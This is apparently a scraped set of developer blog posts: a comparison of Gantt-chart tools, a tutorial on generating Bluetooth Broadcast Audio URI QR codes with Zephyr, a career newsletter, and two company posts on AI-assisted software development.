**Capabilities**

- Create and format tasks on the sidebar
- Set task dependencies (predecessor or successor)
- Change dates or move the timeline directly on the chart
- Scale the project by days, weeks, months, quarters, and years
- Specify the number of days required to complete a task
- Filter tasks by priority, date, or status on the sidebar, and manually rearrange them
- View task change history
- Prevent planning on weekends (a plus in my book)
- Collapse the sidebar to fully appreciate the Gantt chart visualization
- Add and manage milestones
- Require result verification before marking a task as complete
- Set privacy for guest users
- Export and import in xlsx and pdf formats (useful for presentations)

**Limitations / Not Yet Available**

- No option to set task start and end times
- You can create tasks on the sidebar, but you can only edit dates and efficiency, not the text itself
- Task progress is not displayed on the chart
## **ClickUp**
A task and project management platform with automation and real-time collaboration. It includes a mobile app that displays the Gantt chart, perfect for checking project progress even if you wake up in a cold sweat in the middle of the night.
**Available Plans for Gantt Chart Creation**
The free plan includes the Gantt chart feature. It allows up to 60 users in the workspace, but data storage is limited to 100 MB. If you need more storage, it costs $7 per person per month with annual payment.
**Interface Features**
- Task and subtask names on the panel and chart
- On the chart: deadlines, task dependencies, executor initials, dates with weekend display
- On the panel: customizable elements based on user preferences

**Capabilities**

- Create, move, and quickly edit tasks on the sidebar
- Set task dependencies directly on the chart
- Assign task statuses and milestones, but only in advanced editing
- Scale task display by days, weeks, months, and years
- Set specific task execution times (from and to) or the number of hours
- Indicate task priority
- Receive email notifications
- Extensive sorting options
- Snapshot feature for comparing and tracking progress or using in presentations
- View the time gap until the next task (with dependency) or until the final task, indicated by markers on the chart

**Limitations / Not Yet Available**

- Task priority is not displayed on the chart or sidebar
- Milestones are also not displayed on the chart
- Progress stages are visible only for the entire project
## **GanttPRO**
GanttPRO is a resource that allows extensive customization of Gantt charts, offering various settings, colors, statuses, filtering, and display options. It's a popular system supporting export from files in xlsx, csv, mpp formats, and from Jira.
**Available Plans for Gantt Chart Creation**
You can test the program for 14 days for free without any feature restrictions. After that, you need to switch to a paid plan. The simplest plan costs $7.99 per month and includes most features: Gantt chart creation, templates and their auto-filling, task linking, filtering, etc. However, even the minimal plan has some limitations.
**Interface Features**
- Task and subtask names on the chart and sidebar
- Executor in "First Name Last Name" format on the sidebar and initials on the chart
- On the chart: deadlines and progress, task dependencies, milestones
- On the sidebar: task status and priority. Parameters are provided by default. Display elements on the sidebar and chart can be flexibly customized.

**Capabilities**

- Start and finish of the main task depend on subtasks, and their time frames can be adjusted on the chart
- Task positions are automatically corrected when setting dependencies
- Contrast highlighting of main tasks and subtasks on the chart
- Chart scaling by years, quarters, months, weeks, days, and even hours
- Mass formatting and task numbering
- Set the lag time for the next task to start after the previous one ends or parallel dependent tasks
- Set specific task execution times (from and to) or the number of hours
- Choose task color and priority level (from lowest to highest)
- Many filters available for task display
- Quick parameter editing on the sidebar
- Task progress is adjusted on the chart in %
- Highlight overdue tasks with one click
- Email notifications and export in pdf, png, xlsx, xml formats
- The main perk — you can upload an Excel file or Google Sheet with a list of tasks and deadlines, and the service will automatically build a chart based on the document

**Limitations / Not Yet Available**

- Days of the week are not displayed on the chart
- Sorting is available either manually (dragging tasks) or cascaded — by date
- Change history is available not for individual tasks but for the entire project
## **Team Gantt**
Another tool focused specifically on Gantt charts. It is somewhat simpler than the previous one and has a soft, user-friendly interface. It supports export in pdf, xlsx, csv, or png formats. If you intend to use Gantt charts as your primary tool, this is a good choice.
**Available Plans for Gantt Chart Creation**
The free plan allows you to create only one Gantt chart and connect up to three users, including the creator. There are also limitations on task formatting. The standard plan at $19 per month per user removes these limitations. Higher-tier plans offer additional features.
**Interface Features**
- Deadlines and progress on the chart and sidebar
- Executor in First Name Last Name format on the sidebar and chart
- On the chart: task dependencies, milestones, dates, and days of the week
- On the sidebar: task and subtask names

**Capabilities**

- Hide completed tasks with a single click
- Choose task colors and sort by them
- Set time frames and dependencies directly on the chart
- Adjust task progress on the sidebar and display it on the chart
- View change history for specific tasks
- Contrast separation of main tasks and subtasks on the chart and sidebar
- Quick task parameter editing on the sidebar
- Extensive task display filtering options
- Time tracking and employee workload table (available only on the paid plan)
- Email notifications and export in pdf, xlsx, csv formats

**Limitations / Not Yet Available**

- No option to scale the project by months, days, and years
- Can only create groups with subtasks; creating individual subtasks is not available
- The mobile app does not have a project timeline view
## **Miro**
Miro is an endless interactive digital whiteboard, making it distinct from the other tools listed. It features a minimalist Gantt chart template. Though not the most automated service, it allows for highly detailed customization.
**Available Plans for Gantt Chart Creation**
Free up to three boards, with unlimited Gantt charts on those boards. However, the functionality is significantly limited, with few integrations with external services. The full feature package starts at $16 per month per user with annual payment.
**Interface Features (on the Template)**
- Task names in the form of stickers
- Start and finish of each task and subtask (beside or below the task itself)
- Task dependencies and connections
- Milestones with customizable formats
- Task status (at the bottom of the sticker)

**Capabilities**

- Wide range of color options for tasks, subtasks, arrows, fonts — almost everything
- Flexible formats and sizes for various elements
- Add and remove columns, rows, stickers, arrows — as per the plan
- Set task status (new, in progress, completed)
- Start and finish times on the sidebar or within the task card
- Add links within the task card
- Attach various files on the board — like stickers, photos
- Multiple projects, diagrams, and mind maps can be anchored on one board
- Import data from other project management systems (extended functionality only on paid plans)

In essence, you can customize everything as you wish, but it requires manual effort.

**Limitations / Not Yet Available (and Unlikely to Be Added)**

- No automation whatsoever
- No time tracking or filtering
- Dependencies are unavailable in the free and the cheapest plans
- High-resolution board export for presentations only on paid plans
- Email notifications only for changes made
- No private mode
## **Smartsheet**
Smartsheet is a versatile project management tool that combines the familiarity of spreadsheets with powerful collaboration and project tracking features. It offers a robust Gantt chart functionality, making it a strong choice for managing complex projects.
**Available Plans for Gantt Chart Creation**
Smartsheet offers a 30-day free trial with access to all features. After the trial, the basic plan starts at $14 per month per user, which includes Gantt chart creation, task dependencies, and basic project management features. Higher-tier plans offer additional functionality, such as advanced reporting and resource management.
**Interface Features**
- Task and subtask names on the chart and sidebar
- Start and end dates of tasks and subtasks
- Task dependencies and critical paths
- Milestones with customizable markers
- Task status and priority on the sidebar

**Capabilities**

- Create and format tasks directly on the Gantt chart
- Set dependencies between tasks with drag-and-drop functionality
- Scale the Gantt chart by days, weeks, months, and quarters
- Adjust task duration and timelines directly on the chart
- Use conditional formatting to highlight tasks based on status or priority
- Track task progress with percentage completion bars
- Collaborate with team members in real-time with comments and attachments
- Import and export project data in various formats, including xlsx, csv, and pdf
- Use built-in templates for quick project setup
- Integrate with other tools like Jira, Microsoft Office, and Google Workspace

**Limitations / Not Yet Available**

- Advanced resource management features are only available on higher-tier plans
- Custom reporting options are limited in the basic plan
- No offline mode; requires an internet connection to access and update projects
- Limited customization options for task appearance on the free plan
## **Microsoft Excel**

We'll conclude with an offline tool that has existed since ancient times, or at least before the advent of modern services. Back then, all algorithms were manually assembled, and even now, you can find numerous templates for creating Gantt charts in good old Excel.

**Available Plans for Gantt Chart Creation**

For extensive features for large projects, you can use the paid MS Project. For simpler needs, regular Microsoft Excel is more than sufficient.
**Interface Features**

- On the chart: goals and milestones, dates and days of the week
- On the sidebar: names of main tasks and subtasks, start date of each task and subtask, number of days to complete, categories (task statuses), progress in %, executor's name

**Capabilities**

- Add or remove columns and rows
- Track time for tasks by days
- Set start time and number of days for completion
- Assign task statuses
- Import data from other project management systems and export to some services

**Limitations / Not Yet Available and Unlikely to Be Added**

- Minimal automation, dependent on the template and settings
- Offline version doesn't support multiple users working simultaneously (but you can transfer everything to Google Sheets)
- Attaching additional files is not available, but you can insert links
## Summary
When choosing a service, consider your specific needs. Some may prioritize versatility, while others value a variety of tools.
- For multifunctional programs with Gantt, Kanban, task lists, and calendars, check out the first four services. They offer both free and paid options for teams of all sizes.
- For a Gantt-focused tool with extensive features, go for GanttPRO or TeamGantt.
- If you need a highly customizable service, Miro's interactive board is ideal.
- If you need an offline tool, standard Microsoft Excel is a great choice.
| weeek |
1,869,915 | Broadcast Audio URI | Audio sharing is caring Until recently, most generic Bluetooth enabled speakers and... | 0 | 2024-06-06T20:56:37 | https://dev.to/denladeside/broadcast-audio-uri-1kkd | leaudio, web, bluetooth, zephyr | ---
title: Broadcast Audio URI
published: true
description:
tags: LEAudio, Web, Bluetooth, Zephyr
cover_image: https://dev-to-uploads.s3.amazonaws.com/uploads/articles/hjp0zzgrwwfyrrdmc2ey.png
# published_at: 2024-06-06 22:30 +0000
---
# Audio sharing is caring
Until recently, most generic Bluetooth-enabled speakers and headsets have used Bluetooth Classic. With the introduction of [Bluetooth LE Audio](https://www.bluetooth.com/learn-about-bluetooth/feature-enhancements/le-audio/), a wide new range of solutions becomes possible, and one of the most exciting is the ability to broadcast audio, where the sender and receiver are no longer required to be connected (unlike the 1:1 Bluetooth Classic case, e.g. a phone and a headset).
> _"LE Audio introduces broadcast audio to Bluetooth® technology, a new feature that enables an audio transmitter to broadcast to an unlimited number of nearby Bluetooth audio receivers. Broadcast audio opens significant new opportunities for innovation, including a powerful new capability, Auracast™ broadcast audio._
>
> _Auracast™ broadcast audio is a set of defined configurations of Bluetooth® broadcast audio which are specified within the Public Broadcast Profile (PBP) specification that enables new, globally interoperable audio experiences for consumers."_
Read more about Auracast here: https://www.bluetooth.com/auracast/developers/
# Sharing Links to Broadcasts
Even though it is possible to scan for nearby broadcasts using a [Broadcast Audio Assistant](https://www.bluetooth.com/auracast/how-it-works/), sometimes, it will be more practical for users to 'tune in' to Broadcast sources using a trusted link provided through other means.
The [Broadcast Audio URI](https://www.bluetooth.com/specifications/specs/broadcast-audio-uri-2/) is an exciting new spec that allows just that: Information about a Broadcast Audio Source to be conveyed over an out-of-band (OOB) medium to a Broadcast Audio Assistant - or, if the Broadcast Sink supports it, directly by e.g. touching an NFC tag, containing the Broadcast Audio URI, with a speaker or earbuds.
An example from the spec:

This includes all the information for a Broadcast Sink to find the right broadcast. The data in the QR code is this text:
```
BLUETOOTH:UUID:184F;BN:SG9ja2V5;SQ:1;AT:0;AD:AABBCC001122;AS:1;BI:DE51E9;PI:FFFF;NS:1;BS:1;;
```
Which roughly translates to:
"Related to the 0x184F UUID (Broadcast Audio Scan Service), there is a Standard Quality mono channel broadcast at address AA:BB:CC:00:11:22 with Broadcast ID 0xDE51E9 and the Broadcast Name 'Hockey'"
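For illustration, here is a minimal sketch of parsing that key/value format and decoding the base64-encoded Broadcast Name. It handles just the fields appearing in the example above, not the full escaping rules of the spec:

```python
import base64

def parse_broadcast_audio_uri(uri):
    """Split a 'BLUETOOTH:' URI into its key/value fields; decode the base64 name."""
    if not uri.startswith("BLUETOOTH:"):
        raise ValueError("not a Bluetooth URI")
    body = uri[len("BLUETOOTH:"):].rstrip(";")  # the URI is terminated with ';;'
    fields = dict(part.split(":", 1) for part in body.split(";") if part)
    if "BN" in fields:  # Broadcast Name is carried base64-encoded
        fields["BN"] = base64.b64decode(fields["BN"]).decode("utf-8")
    return fields

uri = ("BLUETOOTH:UUID:184F;BN:SG9ja2V5;SQ:1;AT:0;AD:AABBCC001122;"
       "AS:1;BI:DE51E9;PI:FFFF;NS:1;BS:1;;")
fields = parse_broadcast_audio_uri(uri)
print(fields["BN"], fields["AD"], fields["BI"])  # Hockey AABBCC001122 DE51E9
```

Note how `SG9ja2V5` decodes straight back to the Broadcast Name "Hockey" from the example.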
# Zephyr for the win!
The [Zephyr RTOS](https://www.zephyrproject.org/) is a very powerful OS for embedded devices and it also includes support for [LE Audio](https://docs.zephyrproject.org/latest/connectivity/bluetooth/api/audio/bluetooth-le-audio-arch.html). If this is the first time you hear about it, please check some of my other posts on getting started with Zephyr, e.g. [Getting started with Zephyr and Web Bluetooth](https://dev.to/denladeside/getting-started-with-zephyr-and-web-bluetooth-355d)
In the Zephyr repo, there is a [Broadcast Audio Source sample](https://github.com/zephyrproject-rtos/zephyr/tree/main/samples/bluetooth/bap_broadcast_source) that was used as a starting point.
There is also great support for different displays, which we will need to display the Broadcast Audio URI in a QR code.
To my happy surprise, there was already [QR code support](https://docs.lvgl.io/master/libs/qrcode.html) in the [LVGL](https://lvgl.io/) module included in Zephyr so I implemented some minimal QR-Code functionality to expose the required data once the Broadcast source was ready on the device. As this is a PoC, the non-changing parameters are hardcoded:
```c
void gui_update_qr_code(const bt_addr_t *addr, uint32_t broadcast_id, uint8_t *name)
{
    uint8_t addr_str[13];
    uint8_t name_base64[128];
    size_t name_base64_len;

    /* Address, rendered as 12 hex digits (most significant byte first) */
    snprintk(addr_str, sizeof(addr_str), "%02X%02X%02X%02X%02X%02X",
             addr->val[5], addr->val[4], addr->val[3],
             addr->val[2], addr->val[1], addr->val[0]);

    /* Name: the Broadcast Name (BN) field is carried base64-encoded */
    base64_encode(name_base64, sizeof(name_base64), &name_base64_len,
                  name, strlen(name));
    name_base64[name_base64_len] = 0; /* NUL-terminate right after the encoded bytes */

    /* Most fields hard coded for this demo */
    snprintk(qr_data, sizeof(qr_data),
             "BLUETOOTH:UUID:184F;BN:%s;SQ:1;AT:1;AD:%s;AS:0;BI:%06X;PI:FFFF;NS:1;BS:1;;",
             name_base64, addr_str, broadcast_id);

    lv_qrcode_update(qr_code, qr_data, strlen(qr_data));
    lv_task_handler();
}
```
The result is here:

# Try it out!
Put together, here is a PoC of how a [Broadcast Audio URI](https://www.bluetooth.com/specifications/specs/broadcast-audio-uri-2/) can be used to expose a dynamically generated QR code on an nRF5340 Audio DK with a screen attached.
> Hardware used:
> * [nRF5340 Audio DK](https://www.nordicsemi.com/Products/Development-hardware/nRF5340-Audio-DK)
> * [Adafruit 2.8" TFT Touch Shield](https://www.adafruit.com/product/1947)
>
The code is available here: https://github.com/larsgk/bau-source
Connecting the board to the USB port of any host device supporting USB Audio (Windows, Linux, Mac, Android, ChromeOS, etc), will automatically make the connected board a Broadcast Audio Source, streaming whatever is played on the host device. If you have access to one of the latest Samsung mobile phones and Galaxy Buds2 Pro, you should be able to find and select the broadcast and hear it in the earbuds.
# See it in action
Currently, there are no implementations of the full Broadcast Audio URI flow in any device available on the market, so I have been using a dedicated web based stand-alone broadcast assistant application, modified to read and parse the Broadcast Audio URI QR code (this will be covered in a future post). It's using the [BarcodeDetector API](https://developer.mozilla.org/en-US/docs/Web/API/BarcodeDetector) on supported devices to read the QR code.
It allows a user to scan a Broadcast Audio URI QR code and add it directly to an attached Broadcast Sink (e.g earbuds able to receive broadcasts, like the Samsung Galaxy Buds2 Pro).
The result is here:
{% youtube NZ0PG1rOZYQ %}
Credits to [Nick Hunn](https://www.nickhunn.com/), [Hai Shalom](https://www.linkedin.com/in/haishalom/) and others for their great work on the [Broadcast Audio URI](https://www.bluetooth.com/specifications/specs/broadcast-audio-uri-2/)
| denladeside |
1,879,645 | The Art of Being Bored: The Upside to Downtime | own to the ATL to be one of the official MC’s/hosts of Render 2024. If you plan on being there please... | 0 | 2024-06-06T20:32:00 | https://dev.to/tdesseyn/the-art-of-being-bored-the-upside-to-downtime-4ggo | careerdevelopment, career | own to the ATL to be one of the official MC’s/hosts of Render 2024. If you plan on being there please come find me!! I have no idea what stage I’m going to be on but just listen for my loud voice :) But for real, let’s get into some conference prep for Render before we dive into a recent live show I did…
- Do your research on what sessions to go to; Render has a mobile app so pick what events you want to attend on the front end! Trust me, I’ve rolled into conferences not prepping and I panic.
- Figure out your elevator pitch; you are going to meet a TON of people for about 30 seconds at a time so you need to be able to tell that person EXACTLY what you do and what you want to do quickly.
- Get as many people into your LinkedIn ecosystem as you can and then follow up after the conference; most people don’t follow up and you lose a TON of momentum.
I hope you have a blast at Render if you go! If you aren’t going to Render, then I hope you enjoyed that conference prep for the next conference you attend! Anywho, let’s get to the meat and potatoes of the newsletter….
I recently had [Reid Evans on to talk](https://www.youtube.com/live/ApsTmK8izOY) about something I think we’re all feeling— getting tired of “the grind.” Whether you’ve lost career momentum, said yes to too many things/people, or are just tired of the corporate life (more about that later), let’s take a sec to stop and think about what we’re actively doing to make that situation better.
You know that whole 'never-ending, pedal to the metal' vibe in our industry? It's coming from all directions. We're stuck in this work culture where jobs disappear, but the workload just keeps piling up on everyone else. Or let's be real, some of us have kind of become low-key addicted to the hustle. Looking at myself here. But that gets me to my point, and a big topic that Reid and I talked about, we’ve really forgotten how to be bored.
Being constantly busy does a couple of things we probably don’t think about. It forces us into a schedule AND it also distracts us from thinking about life’s what-ifs. Hear me out, would the grind be so bad if you were actually working on something you were passionate about? And when’s the last time you took the time to slow down, be bored, and think about what that passion actually is?
Obviously this conversation comes from a place of privilege of not being restricted by money or other circumstances. But I think we owe it to ourselves to take some time now and again to be bored. And tbh it’s uncomfortable. From experience. But the clarity and the conversations you have with yourself and others after are worth it. I’m going to work on more intentional boredom and y’all let me know if it works for you.
To those of you that are tired of corporate America and on the verge of rage quitting, this part is for you. So many people are over the whole 'circling back' 9-5 routine... Talking about making the move to freelance, Reid said something along the lines of he was tired of working so hard to make money for other people and tired of those people spending that money on him for things he doesn’t need or want. Which is the problem with corporate life in a nutshell. What he did do, though, is have a loose plan and more importantly some savings. So if you’re thinking that you don’t need no “man” to make money, you’re probably right but rage quitting is very rarely successful. What should we call quitting with a plan, premeditated quitting? Do that.
Alright, I hope I’ll see some of y’all at Render and we can talk about this more. I want to hear what you’re thinking. | tdesseyn |
1,879,642 | GenAI is Shaping the Future of Software Development | In the second part of the conversation on the Emerj podcast, Tsavo Knott joins Daniel Faggella to discuss the rapid progression of generative AI capabilities. | 0 | 2024-06-06T20:25:13 | https://code.pieces.app/blog/genai-is-shaping-the-future-of-software-development | <figure><img src="https://d37oebn0w9ir6a.cloudfront.net/account_32099/gen-ai-part2_bd5b16a3770867b50765007ead50718e.jpg" alt="GenAI is Shaping the Future of Software Development."/></figure>
In the second part of the conversation on the Emerj podcast, Tsavo Knott, CEO of Pieces, joins Daniel Faggella, Emerj CEO and Head of Research, to discuss the rapid progression of generative AI (GenAI) capabilities and their profound impact on developer markets and the future of software development. This discussion highlights both the limitations and the boundless potential of GenAI tools, offering valuable insights for business leaders and developers alike.
Tsavo also shares how [systems that augment human work](https://code.pieces.app/blog/how-ai-automation-benefits-world-class-developers) are transforming the roles of individual workers, making them less about performing specific tasks and more about becoming cross-functional assets within their organizations. He highlights how Pieces is at the forefront of this transformation, providing tools that help developers navigate and thrive in this evolving landscape.
## The Evolution of Software Development
Tsavo begins by expressing his excitement about the evolution of machine learning and its implications for the products that Pieces is building. He emphasizes how the company aims to augment developer work streams, enhancing productivity and enabling the creation of unique experiences at a faster pace. All of this is driven by an increased demand for GenAI software solutions in various industries, a shortage of skilled developers, and the ever-rising complexity of software projects.
A key concept discussed is the "[context window](https://code.pieces.app/blog/ai-context-making-the-most-out-of-your-llm-context-length)," which refers to the amount of background knowledge a model has at processing time. Tsavo explains that traditionally, context windows were very small, containing about 2,000 tokens, which is equivalent to a handful of files. In contrast, modern models like GPT-4 can handle around 32,000 tokens or roughly 300 pages of text. He summarizes that "in theory, more context is better."
## Limitations of the Current GenAI Tooling
Discussing the constraints of the current machine learning and generative AI tools, Tsavo highlights the dual role of [GenAI](https://code.pieces.app/blog/conversational-ai-vs-generative-ai-benefits) as both a search and authorship mechanism. He provides examples of authorship, including writing new code, authoring marketing content, and generating financial projections. While GenAI systems enable faster creation of digital assets, Tsavo warns that the quality of the output can be average due to inherent biases in the underlying data.
He cautions that while GenAI tools can produce millions of lines of code quickly, the quality might not be high. He underscores the importance of improving models in areas such as context windows, tokens per second, and output to keep up with future demands.
## Growing Use Cases and the Potential of GenAI
Despite the challenges with GenAI, Tsavo anticipates massive growth in server farms dedicated to powering AI systems and foresees significant advancements in on-device models and supporting consumer hardware. He identifies several fundamentals that will limit the ability to ship products with desired features and functionality, including supply, GPU, compute, and energy.
However, he believes that humans will continue to find creative ways to apply these models across various industries. He points out that there is an abundance of untapped data, including hundreds of years of information from Fortune 100 companies. Tsavo emphasizes that we are only scratching the surface of the power requirements needed to leverage this data.
## Shift in the Role of Developers
Tsavo also anticipates a [shift](https://code.pieces.app/blog/dont-just-shift-left-shift-down-to-empower-your-devops-team) in the role of individual workers, with developers becoming more cross-functional across their organizations. He believes that this cross-functional behavior will naturally change the structure of organizations, flattening layers and making them more efficient. This, in turn, will enable the US to upskill its development workforce to the highest level, or "10x," helping it keep up with countries that have larger workforces.
## Final Thoughts
The second part of the Emerj podcast with Tsavo Knott provided a comprehensive overview of the challenges and opportunities presented by generative AI in software development. As the industry continues to evolve, the insights shared underscore the importance of adaptability, the potential for GenAI to augment human creativity, and the strategic considerations for leveraging these advancements. At Pieces, we are committed to providing the tools and technologies that empower developers to navigate this changing landscape successfully.
Want to dive deeper into these topics? [Tune into the full podcast episode](https://emerj.com/ai-podcast-interviews/market-and-tech-forces-shaping-future-of-software-development-tsavo-knott-pieces/) for more expert insights from Tsavo Knott on the rise of the [exciting phase of generative AI startups](https://code.pieces.app/blog/future-of-generative-ai-startups-pieces-copilot-ama-recap-highlights) and other GenAI tools. | get_pieces | |
1,879,628 | How AI Automation Benefits World-Class Developers | Tsavo Knott, Co-founder and CEO of Pieces, recently shared his insights on AI in software development during an engaging conversation on the Emerj podcast. | 0 | 2024-06-06T20:18:47 | https://code.pieces.app/blog/how-ai-automation-benefits-world-class-developers | <figure><img src="https://d37oebn0w9ir6a.cloudfront.net/account_32099/gen-ai-part1_62188ba6d44b25eec0de388bc37af1f0.jpg" alt="How AI Automation Benefits World-Class Developers."/></figure>
The role of software developers is undergoing a significant transformation in today's rapidly evolving technological landscape, driven by radical advancements in AI and automation. The advent of AI automation tools and technologies is at the forefront of this change, enabling developers to work more efficiently and effectively. These advancements are not about replacing human effort but enhancing it, allowing developers to focus on the more complex and creative aspects of their work.
Tsavo Knott, Co-founder and CEO of Pieces, recently shared his insights on this topic during an engaging conversation on the Emerj podcast. In this discussion, Tsavo digs into the nuances of modern development tools, categorizing companies based on their approach and highlighting how Pieces is navigating these advancements. Here, we explore the key points discussed and examine the evolving role of developers in this new era.
## Understanding the Two Approaches to Automation
Tsavo begins by categorizing companies into two distinct groups based on their approach to intelligent automation:
**1. Full Automation and Replacement**: Some companies are exploring the possibility of fully automating and replacing the roles of certain developers. These organizations are evaluating whether autonomous agents can completely take over the tasks traditionally performed by developers.
**2. Augmentation and Enhancement**: Pieces falls into the second category, which acknowledges that while the role of developers is changing, it is not becoming obsolete. Instead, developers are becoming more cross-functional and are being profoundly augmented with advanced AI automation tools. Tsavo emphasizes that developers are now working on more tasks and doing so at a faster pace.
## The Changing Role of Developers
Tsavo reflects on how his role as a developer has evolved over the past few years. Previously, he focused exclusively on writing code in a few languages. However, with the advent of AI systems, he now writes code for every team in his company. This shift has allowed him to move faster across the entire organization, spending less time intensely focused on one particular area or language.
## Complexities Faced by AI Systems
While AI systems have made significant strides, they still face considerable challenges, especially when it comes to understanding and refactoring poorly written code, often known as "spaghetti code." For AI automation to effectively manage such tasks, it would need an extensive contextual understanding of the code base, an understanding of the original structure and logic of the codebase, and the ability to handle a vast array of parameters to accurately interpret and modify the code.
The benefit of 10x engineers, according to Tsavo, is that they inherently possess this information and keep stakeholders in mind before they build. Tsavo concludes with advice on how developers can use intelligent automation tools to complement their work. He suggests that developers should evaluate whether they are spending most of their time figuring out how to solve a problem and, if so, consider using [generative AI](https://code.pieces.app/blog/genai-is-shaping-the-future-of-software-development) to expedite the process. Learning to identify when it is ideal to use these tools is crucial for enhancing productivity.
## Pieces' Approach to AI Automation and Augmentation
At Pieces, the focus is on [creating tools](https://docs.pieces.app/features/pieces-copilot) that [augment the capabilities of developers](https://code.pieces.app/blog/workflow-integration-with-ai-a-unified-approach-to-development) rather than replacing them. This approach is rooted in the belief that developers are becoming more cross-functional and need advanced tools to keep up with the increasing demands of their roles. By providing these tools, Pieces aims to help developers work more efficiently and effectively.
## Final Thoughts
This episode of the Emerj podcast with Tsavo Knott provided a comprehensive overview of the challenges and opportunities presented by artificial intelligence automation in software development. As the industry continues to evolve, the insights shared underscore the importance of adaptability, the potential for AI to augment human creativity, and the strategic considerations for leveraging these advancements.
With tools like Pieces for Developers, there's a pathway to navigate these changes, ensuring that the future of software development is as exciting as it is challenging. At Pieces, we are committed to providing the tools and technologies that empower developers to navigate this changing AI automation landscape successfully.
Want to dive deeper into these topics? [Tune into the full podcast episode](https://emerj.com/ai-podcast-interviews/automation-and-augmentation-in-development-tools-tsavo-knott-pieces/) for more expert insights from Tsavo Knott on the rise of the exciting phase of AI-powered automation, the role of developers in an AI-augmented future, and how to become an AI-powered enterprise. | get_pieces |